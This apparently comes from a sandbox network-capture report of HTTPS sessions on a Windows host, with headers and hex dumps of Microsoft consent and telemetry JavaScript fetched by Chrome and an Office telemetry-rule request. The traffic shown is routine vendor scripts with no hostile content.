                                                                                                                                                                                                                      If-None-Match: 0x8DCEC757C1AD1D1
                                                                                                                                                                                                                      If-Modified-Since: Mon, 14 Oct 2024 17:27:31 GMT
                                                                                                                                                                                                                      2024-11-20 16:42:07 UTC807INHTTP/1.1 304 Not Modified
                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 16:42:07 GMT
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                      Cache-Control: no-transform, public, max-age=1800, immutable
                                                                                                                                                                                                                      Last-Modified: Mon, 14 Oct 2024 17:27:31 GMT
                                                                                                                                                                                                                      ETag: 0x8DCEC757C1AD1D1
                                                                                                                                                                                                                      x-ms-request-id: 24663fe8-301e-00d3-0bb2-2cfca8000000
                                                                                                                                                                                                                      x-ms-version: 2009-09-19
                                                                                                                                                                                                                      x-ms-meta-jssdkver: 4.3.3
                                                                                                                                                                                                                      x-ms-meta-jssdksrc: [cdn]/scripts/c/ms.jsll-4.3.3.min.js
                                                                                                                                                                                                                      Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,x-ms-meta-jssdkver,x-ms-meta-jssdksrc,Content-Type,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                                                      x-azure-ref: 20241120T164207Z-185f5d8b95cwtv72hC1NYC141w0000000ag000000000283s
                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                      X-Cache-Info: L1_T2
                                                                                                                                                                                                                      X-Cache: TCP_HIT


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      104192.168.2.74983113.107.246.634436380C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-20 16:42:06 UTC373OUTGET /mscc/lib/v2/wcp-consent.js HTTP/1.1
                                                                                                                                                                                                                      Host: wcpstatic.microsoft.com
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                      2024-11-20 16:42:07 UTC713INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 16:42:07 GMT
                                                                                                                                                                                                                      Content-Type: application/javascript
                                                                                                                                                                                                                      Content-Length: 52717
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                                                      Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Length,Date,Transfer-Encoding
                                                                                                                                                                                                                      Age: 34593
                                                                                                                                                                                                                      Cache-Control: max-age=43200
                                                                                                                                                                                                                      Content-MD5: QT/MdZzBmCG2G2lBgIsptQ==
                                                                                                                                                                                                                      Etag: 0x8DA85F6F74C6D08
                                                                                                                                                                                                                      Last-Modified: Wed, 24 Aug 2022 17:34:58 GMT
                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                      X-Cache: CONFIG_NOCACHE
                                                                                                                                                                                                                      x-ms-blob-type: BlockBlob
                                                                                                                                                                                                                      x-ms-lease-status: unlocked
                                                                                                                                                                                                                      x-ms-request-id: 4aa39486-701e-007b-0f1a-3b6206000000
                                                                                                                                                                                                                      x-ms-version: 2009-09-19
                                                                                                                                                                                                                      x-azure-ref: 20241120T164207Z-185f5d8b95cqnkdjhC1NYCm8w80000000a9g00000000ryg0
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      2024-11-20 16:42:07 UTC16384INData Raw: 76 61 72 20 57 63 70 43 6f 6e 73 65 6e 74 3b 21 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 7b 32 32 39 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 77 69 6e 64 6f 77 2c 65 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 7b 7d 3b 66 75 6e 63 74 69 6f 6e 20 6f 28 6e 29 7b 69 66 28 74 5b 6e 5d 29 72 65 74 75 72 6e 20 74 5b 6e 5d 2e 65 78 70 6f 72 74 73 3b 76 61 72 20 72 3d 74 5b 6e 5d 3d 7b 69 3a 6e 2c 6c 3a 21 31 2c 65 78 70 6f 72 74 73 3a 7b 7d 7d 3b 72 65 74 75 72 6e 20 65 5b 6e 5d 2e 63 61 6c 6c 28 72 2e 65 78 70 6f 72 74 73 2c 72 2c 72 2e 65 78 70 6f 72 74 73 2c 6f 29 2c 72 2e 6c 3d 21 30 2c 72 2e 65 78 70 6f 72 74 73 7d 72 65 74 75 72 6e 20 6f 2e 6d 3d 65 2c 6f 2e 63 3d 74 2c 6f 2e 64 3d 66 75 6e 63 74 69 6f 6e 28 65
                                                                                                                                                                                                                      Data Ascii: var WcpConsent;!function(){var e={229:function(e){window,e.exports=function(e){var t={};function o(n){if(t[n])return t[n].exports;var r=t[n]={i:n,l:!1,exports:{}};return e[n].call(r.exports,r,r.exports,o),r.l=!0,r.exports}return o.m=e,o.c=t,o.d=function(e
                                                                                                                                                                                                                      2024-11-20 16:42:07 UTC16384INData Raw: 2d 6c 61 62 65 6c 3d 22 27 2b 69 2e 65 73 63 61 70 65 48 74 6d 6c 28 74 68 69 73 2e 74 65 78 74 52 65 73 6f 75 72 63 65 73 2e 70 72 65 66 65 72 65 6e 63 65 73 44 69 61 6c 6f 67 43 6c 6f 73 65 4c 61 62 65 6c 29 2b 27 22 20 63 6c 61 73 73 3d 22 27 2b 61 2e 63 6c 6f 73 65 4d 6f 64 61 6c 49 63 6f 6e 2b 27 22 20 74 61 62 69 6e 64 65 78 3d 22 30 22 3e 26 23 78 32 37 31 35 3b 3c 2f 62 75 74 74 6f 6e 3e 5c 6e 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 72 6f 6c 65 3d 22 64 6f 63 75 6d 65 6e 74 22 20 63 6c 61 73 73 3d 22 27 2b 61 2e 6d 6f 64 61 6c 42 6f 64 79 2b 27 22 3e 5c 6e 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 3e 5c 6e 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 31 20 63 6c 61 73 73 3d 22 27 2b 61 2e 6d 6f 64
                                                                                                                                                                                                                      Data Ascii: -label="'+i.escapeHtml(this.textResources.preferencesDialogCloseLabel)+'" class="'+a.closeModalIcon+'" tabindex="0">&#x2715;</button>\n <div role="document" class="'+a.modalBody+'">\n <div>\n <h1 class="'+a.mod
                                                                                                                                                                                                                      2024-11-20 16:42:07 UTC16381INData Raw: 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 22 2b 65 5b 22 72 61 64 69 6f 2d 62 75 74 74 6f 6e 2d 64 69 73 61 62 6c 65 64 2d 63 6f 6c 6f 72 22 5d 2b 22 20 21 69 6d 70 6f 72 74 61 6e 74 3b 5c 6e 20 20 20 20 20 20 20 20 7d 22 7d 2c 65 7d 28 29 2c 64 3d 5b 22 61 72 22 2c 22 68 65 22 2c 22 70 73 22 2c 22 75 72 22 2c 22 66 61 22 2c 22 70 61 22 2c 22 73 64 22 2c 22 74 6b 22 2c 22 75 67 22 2c 22 79 69 22 2c 22 73 79 72 22 2c 22 6b 73 2d 61 72 61 62 22 5d 2c 75 3d 7b 22 63 6c 6f 73 65 2d 62 75 74 74 6f 6e 2d 63 6f 6c 6f 72 22 3a 22 23 36 36 36 36 36 36 22 2c 22 73 65 63 6f 6e 64 61 72 79 2d 62 75 74 74 6f 6e 2d 64 69 73 61 62 6c 65 64 2d 6f 70 61 63 69 74 79 22 3a 22 31 22 2c 22 73 65 63 6f 6e 64 61 72 79 2d 62 75 74 74 6f 6e 2d
                                                                                                                                                                                                                      Data Ascii: background-color: "+e["radio-button-disabled-color"]+" !important;\n }"},e}(),d=["ar","he","ps","ur","fa","pa","sd","tk","ug","yi","syr","ks-arab"],u={"close-button-color":"#666666","secondary-button-disabled-opacity":"1","secondary-button-
                                                                                                                                                                                                                      2024-11-20 16:42:07 UTC3568INData Raw: 74 28 22 2d 22 29 5b 30 5d 3b 6f 3d 65 2e 73 70 6c 69 74 28 22 2d 22 29 5b 30 5d 3d 3d 3d 6e 7d 72 65 74 75 72 6e 20 6f 7d 28 65 2c 63 29 7d 29 29 3b 73 26 26 30 3d 3d 3d 73 2e 6c 65 6e 67 74 68 26 26 28 65 3d 22 65 6e 2d 55 53 22 29 2c 6f 2e 70 6c 61 63 65 68 6f 6c 64 65 72 45 6c 65 6d 65 6e 74 3d 6c 2c 72 26 26 6f 2e 63 6f 6e 73 65 6e 74 43 68 61 6e 67 65 64 43 61 6c 6c 62 61 63 6b 73 2e 72 65 67 69 73 74 65 72 43 61 6c 6c 62 61 63 6b 28 72 29 2c 6f 2e 73 61 76 65 43 6f 6f 6b 69 65 28 29 2c 6f 2e 73 69 74 65 43 6f 6e 73 65 6e 74 3d 6e 65 77 20 66 28 21 31 29 2c 6e 75 6c 6c 3d 3d 6e 7c 7c 6e 28 76 6f 69 64 20 30 2c 6f 2e 73 69 74 65 43 6f 6e 73 65 6e 74 29 2c 6f 2e 69 73 49 6e 69 74 52 65 61 64 79 3d 21 30 2c 74 68 69 73 2e 63 6f 6e 73 65 6e 74 43 68 61
                                                                                                                                                                                                                      Data Ascii: t("-")[0];o=e.split("-")[0]===n}return o}(e,c)}));s&&0===s.length&&(e="en-US"),o.placeholderElement=l,r&&o.consentChangedCallbacks.registerCallback(r),o.saveCookie(),o.siteConsent=new f(!1),null==n||n(void 0,o.siteConsent),o.isInitReady=!0,this.consentCha


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      105192.168.2.74983413.107.246.634436380C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-20 16:42:07 UTC370OUTGET /scripts/c/ms.jsll-4.min.js HTTP/1.1
                                                                                                                                                                                                                      Host: js.monitor.azure.com
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                      2024-11-20 16:42:08 UTC889INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 16:42:07 GMT
                                                                                                                                                                                                                      Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                                                      Content-Length: 207935
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                      Cache-Control: no-transform, public, max-age=1800, immutable
                                                                                                                                                                                                                      Last-Modified: Mon, 14 Oct 2024 17:27:31 GMT
                                                                                                                                                                                                                      ETag: 0x8DCEC757C1AD1D1
                                                                                                                                                                                                                      x-ms-request-id: 24663fe8-301e-00d3-0bb2-2cfca8000000
                                                                                                                                                                                                                      x-ms-version: 2009-09-19
                                                                                                                                                                                                                      x-ms-meta-jssdkver: 4.3.3
                                                                                                                                                                                                                      x-ms-meta-jssdksrc: [cdn]/scripts/c/ms.jsll-4.3.3.min.js
                                                                                                                                                                                                                      Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,x-ms-meta-jssdkver,x-ms-meta-jssdksrc,Content-Type,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                                                      x-azure-ref: 20241120T164207Z-r1d97b99577lxltfhC1TEByw2s00000009800000000032vd
                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                      X-Cache-Info: L1_T2
                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      2024-11-20 16:42:08 UTC15495INData Raw: 2f 2a 21 0a 20 2a 20 31 44 53 20 4a 53 4c 4c 20 53 4b 55 2c 20 34 2e 33 2e 33 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 4d 69 63 72 6f 73 6f 66 74 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 2e 20 41 6c 6c 20 72 69 67 68 74 73 20 72 65 73 65 72 76 65 64 2e 0a 20 2a 20 28 4d 69 63 72 6f 73 6f 66 74 20 49 6e 74 65 72 6e 61 6c 20 4f 6e 6c 79 29 0a 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 22 75 6e 64 65 66 69 6e 65 64 22 3b 69 66 28 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 21 3d 6e 29 74 28 65 78 70 6f 72 74 73 29 3b 65 6c 73 65 20 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69
                                                                                                                                                                                                                      Data Ascii: /*! * 1DS JSLL SKU, 4.3.3 * Copyright (c) Microsoft and contributors. All rights reserved. * (Microsoft Internal Only) */!function(e,t){var n="undefined";if("object"==typeof exports&&typeof module!=n)t(exports);else if("function"==typeof define&&defi
                                                                                                                                                                                                                      2024-11-20 16:42:08 UTC16384INData Raw: 28 69 29 3a 28 72 3d 66 65 28 22 63 6f 6e 73 6f 6c 65 22 29 29 26 26 28 72 2e 65 72 72 6f 72 7c 7c 72 2e 6c 6f 67 29 28 74 2c 63 65 28 69 29 29 29 29 7d 53 65 28 61 3d 7b 74 68 65 6e 3a 6f 2c 22 63 61 74 63 68 22 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 6f 28 75 6e 64 65 66 69 6e 65 64 2c 65 29 7d 2c 22 66 69 6e 61 6c 6c 79 22 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3d 74 2c 6e 3d 74 3b 72 65 74 75 72 6e 20 51 28 74 29 26 26 28 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 74 26 26 74 28 29 2c 65 7d 2c 6e 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 74 68 72 6f 77 20 74 26 26 74 28 29 2c 65 7d 29 2c 6f 28 65 2c 6e 29 7d 7d 2c 22 73 74 61 74 65 22 2c 7b 67 65 74 3a 64 7d 29 2c 68 74 28 29 26 26 28 61 5b 6d 74 28
                                                                                                                                                                                                                      Data Ascii: (i):(r=fe("console"))&&(r.error||r.log)(t,ce(i))))}Se(a={then:o,"catch":function(e){return o(undefined,e)},"finally":function(t){var e=t,n=t;return Q(t)&&(e=function(e){return t&&t(),e},n=function(e){throw t&&t(),e}),o(e,n)}},"state",{get:d}),ht()&&(a[mt(
                                                                                                                                                                                                                      2024-11-20 16:42:08 UTC16384INData Raw: 28 65 2c 74 2c 6e 2c 72 29 7b 67 65 28 65 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 26 26 65 5b 74 5d 26 26 28 6e 3f 28 6e 2e 63 62 5b 74 65 5d 28 7b 66 6e 3a 72 2c 61 72 67 3a 65 7d 29 2c 6e 2e 68 3d 6e 2e 68 7c 7c 6e 6e 28 70 63 2c 30 2c 6e 29 29 3a 4d 28 72 2c 5b 65 5d 29 29 7d 29 7d 68 63 2e 5f 5f 69 65 44 79 6e 3d 31 3b 76 61 72 20 76 63 3d 68 63 3b 66 75 6e 63 74 69 6f 6e 20 68 63 28 65 29 7b 74 68 69 73 2e 6c 69 73 74 65 6e 65 72 73 3d 5b 5d 3b 76 61 72 20 6e 2c 69 3d 5b 5d 2c 61 3d 7b 68 3a 6e 75 6c 6c 2c 63 62 3a 5b 5d 7d 2c 6f 3d 76 6f 28 65 2c 64 63 29 5b 4b 6e 5d 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 6e 3d 21 21 65 2e 63 66 67 2e 70 65 72 66 45 76 74 73 53 65 6e 64 41 6c 6c 7d 29 3b 76 65 28 68 63 2c 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28
                                                                                                                                                                                                                      Data Ascii: (e,t,n,r){ge(e,function(e){e&&e[t]&&(n?(n.cb[te]({fn:r,arg:e}),n.h=n.h||nn(pc,0,n)):M(r,[e]))})}hc.__ieDyn=1;var vc=hc;function hc(e){this.listeners=[];var n,i=[],a={h:null,cb:[]},o=vo(e,dc)[Kn](function(e){n=!!e.cfg.perfEvtsSendAll});ve(hc,this,function(
                                                                                                                                                                                                                      2024-11-20 16:42:08 UTC16384INData Raw: 28 65 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 61 2e 66 6c 75 73 68 43 6f 6d 70 6c 65 74 65 3d 65 2c 50 3d 21 30 2c 52 2e 72 75 6e 28 6f 2c 61 29 2c 66 5b 67 72 5d 28 29 2c 6f 5b 6c 72 5d 28 61 29 7d 2c 36 2c 6e 29 2c 69 7d 2c 66 5b 6f 72 5d 3d 73 2c 66 2e 61 64 64 50 6c 75 67 69 6e 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 2c 72 29 7b 69 66 28 21 65 29 72 65 74 75 72 6e 20 72 26 26 72 28 21 31 29 2c 76 6f 69 64 20 43 28 6f 75 29 3b 76 61 72 20 69 3d 73 28 65 5b 24 6e 5d 29 3b 69 66 28 69 26 26 21 74 29 72 65 74 75 72 6e 20 72 26 26 72 28 21 31 29 2c 76 6f 69 64 20 43 28 22 50 6c 75 67 69 6e 20 5b 22 2b 65 5b 24 6e 5d 2b 22 5d 20 69 73 20 61 6c 72 65 61 64 79 20 6c 6f 61 64 65 64 21 22 29 3b 76 61 72 20 61 2c 6f 3d 7b 72 65 61 73 6f 6e 3a 31 36 7d 3b 66
                                                                                                                                                                                                                      Data Ascii: (e,function(e){a.flushComplete=e,P=!0,R.run(o,a),f[gr](),o[lr](a)},6,n),i},f[or]=s,f.addPlugin=function(e,t,n,r){if(!e)return r&&r(!1),void C(ou);var i=s(e[$n]);if(i&&!t)return r&&r(!1),void C("Plugin ["+e[$n]+"] is already loaded!");var a,o={reason:16};f
                                                                                                                                                                                                                      2024-11-20 16:42:08 UTC16384INData Raw: 6c 3a 31 2c 43 72 69 74 69 63 61 6c 3a 32 7d 29 2c 75 6e 64 65 66 69 6e 65 64 2c 75 6e 64 65 66 69 6e 65 64 29 2c 53 6c 3d 22 22 3b 66 75 6e 63 74 69 6f 6e 20 78 6c 28 65 29 7b 74 72 79 7b 69 66 28 6f 65 28 6f 74 28 29 29 29 72 65 74 75 72 6e 20 6e 75 6c 6c 3b 76 61 72 20 74 3d 28 6e 65 77 20 44 61 74 65 29 5b 4f 73 5d 28 29 2c 6e 3d 66 65 28 65 3d 3d 3d 45 6c 2e 4c 6f 63 61 6c 53 74 6f 72 61 67 65 3f 22 6c 6f 63 61 6c 53 74 6f 72 61 67 65 22 3a 22 73 65 73 73 69 6f 6e 53 74 6f 72 61 67 65 22 29 2c 72 3d 53 6c 2b 74 2c 69 3d 28 6e 2e 73 65 74 49 74 65 6d 28 72 2c 74 29 2c 6e 2e 67 65 74 49 74 65 6d 28 72 29 21 3d 3d 74 29 3b 69 66 28 6e 5b 52 73 5d 28 72 29 2c 21 69 29 72 65 74 75 72 6e 20 6e 7d 63 61 74 63 68 28 61 29 7b 7d 72 65 74 75 72 6e 20 6e 75 6c
                                                                                                                                                                                                                      Data Ascii: l:1,Critical:2}),undefined,undefined),Sl="";function xl(e){try{if(oe(ot()))return null;var t=(new Date)[Os](),n=fe(e===El.LocalStorage?"localStorage":"sessionStorage"),r=Sl+t,i=(n.setItem(r,t),n.getItem(r)!==t);if(n[Rs](r),!i)return n}catch(a){}return nul
                                                                                                                                                                                                                      2024-11-20 16:42:08 UTC16384INData Raw: 6f 20 74 72 61 63 6b 20 70 61 67 65 20 76 69 73 69 74 20 74 69 6d 65 20 66 61 69 6c 65 64 2c 20 6d 65 74 72 69 63 20 77 69 6c 6c 20 6e 6f 74 20 62 65 20 63 6f 6c 6c 65 63 74 65 64 3a 20 22 2b 63 65 28 72 29 29 7d 7d 2c 59 28 65 2c 22 5f 6c 6f 67 67 65 72 22 2c 7b 67 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6f 7d 7d 29 2c 59 28 65 2c 22 70 61 67 65 56 69 73 69 74 54 69 6d 65 54 72 61 63 6b 69 6e 67 48 61 6e 64 6c 65 72 22 2c 7b 67 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 63 7d 7d 29 7d 29 7d 76 61 72 20 4e 64 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 74 68 69 73 5b 67 64 5d 3d 50 74 28 29 2c 74 68 69 73 2e 70 61 67 65 4e 61 6d 65 3d 65 2c 74 68 69 73 2e 70 61 67 65 55 72 6c 3d 74 7d 2c 44 64 3d 66 75 6e 63 74 69 6f 6e 28
                                                                                                                                                                                                                      Data Ascii: o track page visit time failed, metric will not be collected: "+ce(r))}},Y(e,"_logger",{g:function(){return o}}),Y(e,"pageVisitTimeTrackingHandler",{g:function(){return c}})})}var Nd=function(e,t){this[gd]=Pt(),this.pageName=e,this.pageUrl=t},Dd=function(
                                                                                                                                                                                                                      2024-11-20 16:42:08 UTC16384INData Raw: 63 6f 72 65 44 61 74 61 2c 22 62 65 68 61 76 69 6f 72 22 29 2c 75 65 28 6e 2e 70 61 67 65 54 79 70 65 29 26 26 28 65 2e 70 61 67 65 54 79 70 65 3d 6e 2e 70 61 67 65 54 79 70 65 29 2c 75 65 28 72 2e 5f 70 61 67 65 54 79 70 65 4d 65 74 61 54 61 67 29 26 26 21 75 65 28 65 2e 70 61 67 65 54 79 70 65 29 26 26 28 65 2e 70 61 67 65 54 79 70 65 3d 72 2e 5f 70 61 67 65 54 79 70 65 4d 65 74 61 54 61 67 29 2c 75 65 28 72 2e 5f 6d 61 72 6b 65 74 4d 65 74 61 54 61 67 29 26 26 28 65 2e 6d 61 72 6b 65 74 3d 72 2e 5f 6d 61 72 6b 65 74 4d 65 74 61 54 61 67 29 2c 65 2e 69 73 4c 6f 67 67 65 64 49 6e 3d 47 64 28 72 2e 5f 63 6f 6e 66 69 67 29 2c 74 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 3d 6f 63 28 29 7d 2c 69 70 2e 70 72 6f 74 6f 74 79 70 65 2e 5f 73 65 74 50 61 67 65 54
                                                                                                                                                                                                                      Data Ascii: coreData,"behavior"),ue(n.pageType)&&(e.pageType=n.pageType),ue(r._pageTypeMetaTag)&&!ue(e.pageType)&&(e.pageType=r._pageTypeMetaTag),ue(r._marketMetaTag)&&(e.market=r._marketMetaTag),e.isLoggedIn=Gd(r._config),t.cookieEnabled=oc()},ip.prototype._setPageT
                                                                                                                                                                                                                      2024-11-20 16:42:09 UTC16384INData Raw: 6e 21 30 3b 72 65 74 75 72 6e 21 31 7d 2c 41 70 2e 70 72 6f 74 6f 74 79 70 65 2e 5f 69 73 54 72 61 63 6b 65 64 57 69 74 68 44 61 74 61 42 69 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 3d 65 2e 61 74 74 72 69 62 75 74 65 73 2c 6e 3d 30 3b 6e 3c 74 2e 6c 65 6e 67 74 68 3b 6e 2b 2b 29 69 66 28 7e 74 5b 6e 5d 2e 6e 61 6d 65 2e 69 6e 64 65 78 4f 66 28 22 64 61 74 61 2d 62 69 2d 22 29 29 72 65 74 75 72 6e 21 30 3b 72 65 74 75 72 6e 21 31 7d 2c 41 70 2e 70 72 6f 74 6f 74 79 70 65 2e 5f 69 73 54 72 61 63 6b 65 64 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 3d 65 2e 61 74 74 72 69 62 75 74 65 73 2c 6e 3d 30 3b 6e 3c 74 2e 6c 65 6e 67 74 68 3b 6e 2b 2b 29 69 66 28 22 64 61 74 61 2d 6d 22 3d 3d 3d 74 5b 6e 5d 2e 6e 61 6d
                                                                                                                                                                                                                      Data Ascii: n!0;return!1},Ap.prototype._isTrackedWithDataBi=function(e){for(var t=e.attributes,n=0;n<t.length;n++)if(~t[n].name.indexOf("data-bi-"))return!0;return!1},Ap.prototype._isTracked=function(e){for(var t=e.attributes,n=0;n<t.length;n++)if("data-m"===t[n].nam
                                                                                                                                                                                                                      2024-11-20 16:42:09 UTC16384INData Raw: 75 74 68 54 6f 6b 65 6e 22 2c 61 3d 22 41 75 74 68 58 54 6f 6b 65 6e 22 2c 67 67 3d 22 6d 73 66 70 63 22 2c 76 67 3d 22 75 73 65 72 22 2c 68 67 3d 22 61 6c 6c 6f 77 52 65 71 75 65 73 74 53 65 6e 64 69 6e 67 22 2c 6d 67 3d 22 66 69 72 73 74 52 65 71 75 65 73 74 53 65 6e 74 22 2c 79 67 3d 22 73 68 6f 75 6c 64 41 64 64 43 6c 6f 63 6b 53 6b 65 77 48 65 61 64 65 72 73 22 2c 43 67 3d 22 67 65 74 43 6c 6f 63 6b 53 6b 65 77 48 65 61 64 65 72 56 61 6c 75 65 22 2c 62 67 3d 22 73 65 74 43 6c 6f 63 6b 53 6b 65 77 22 2c 79 65 3d 22 6c 65 6e 67 74 68 22 2c 54 67 3d 22 63 6f 6e 63 61 74 22 2c 49 67 3d 22 69 4b 65 79 22 2c 45 67 3d 22 63 6f 75 6e 74 22 2c 5f 67 3d 22 65 76 65 6e 74 73 22 2c 53 67 3d 22 70 75 73 68 22 2c 78 67 3d 22 73 70 6c 69 74 22 2c 4e 67 3d 22 73 70
                                                                                                                                                                                                                      Data Ascii: uthToken",a="AuthXToken",gg="msfpc",vg="user",hg="allowRequestSending",mg="firstRequestSent",yg="shouldAddClockSkewHeaders",Cg="getClockSkewHeaderValue",bg="setClockSkew",ye="length",Tg="concat",Ig="iKey",Eg="count",_g="events",Sg="push",xg="split",Ng="sp
                                                                                                                                                                                                                      2024-11-20 16:42:09 UTC16384INData Raw: 29 29 2c 65 5b 6c 76 5d 26 26 28 65 5b 6c 76 5d 3d 65 61 28 65 5b 6c 76 5d 29 29 29 7d 66 75 6e 63 74 69 6f 6e 20 61 28 65 2c 74 29 7b 69 66 28 65 5b 79 76 5d 7c 7c 28 65 5b 79 76 5d 3d 30 29 2c 65 5b 43 76 5d 7c 7c 28 65 5b 43 76 5d 3d 31 29 2c 6c 28 65 29 2c 65 5b 62 76 5d 29 69 66 28 55 7c 7c 61 65 29 65 5b 43 76 5d 3d 33 2c 65 5b 62 76 5d 3d 21 31 3b 65 6c 73 65 20 69 66 28 48 29 72 65 74 75 72 6e 20 57 26 26 28 65 3d 65 61 28 65 29 29 2c 48 5b 72 76 5d 28 45 76 2e 63 72 65 61 74 65 28 65 5b 49 67 5d 2c 5b 65 5d 29 2c 21 30 3d 3d 3d 65 5b 62 76 5d 3f 31 3a 65 5b 62 76 5d 2c 33 29 3b 76 61 72 20 6e 3d 65 5b 43 76 5d 2c 72 3d 63 65 2c 69 3d 52 2c 61 3d 28 34 3d 3d 3d 6e 26 26 28 72 3d 6f 65 2c 69 3d 4f 29 2c 21 31 29 3b 72 3c 69 3f 61 3d 21 43 28 65 2c
                                                                                                                                                                                                                      Data Ascii: )),e[lv]&&(e[lv]=ea(e[lv])))}function a(e,t){if(e[yv]||(e[yv]=0),e[Cv]||(e[Cv]=1),l(e),e[bv])if(U||ae)e[Cv]=3,e[bv]=!1;else if(H)return W&&(e=ea(e)),H[rv](Ev.create(e[Ig],[e]),!0===e[bv]?1:e[bv],3);var n=e[Cv],r=ce,i=R,a=(4===n&&(r=oe,i=O),!1);r<i?a=!C(e,


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                      106192.168.2.74983513.107.246.63443
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-20 16:42:07 UTC192OUTGET /rules/rule701251v1s19.xml HTTP/1.1
                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                      2024-11-20 16:42:07 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 16:42:07 GMT
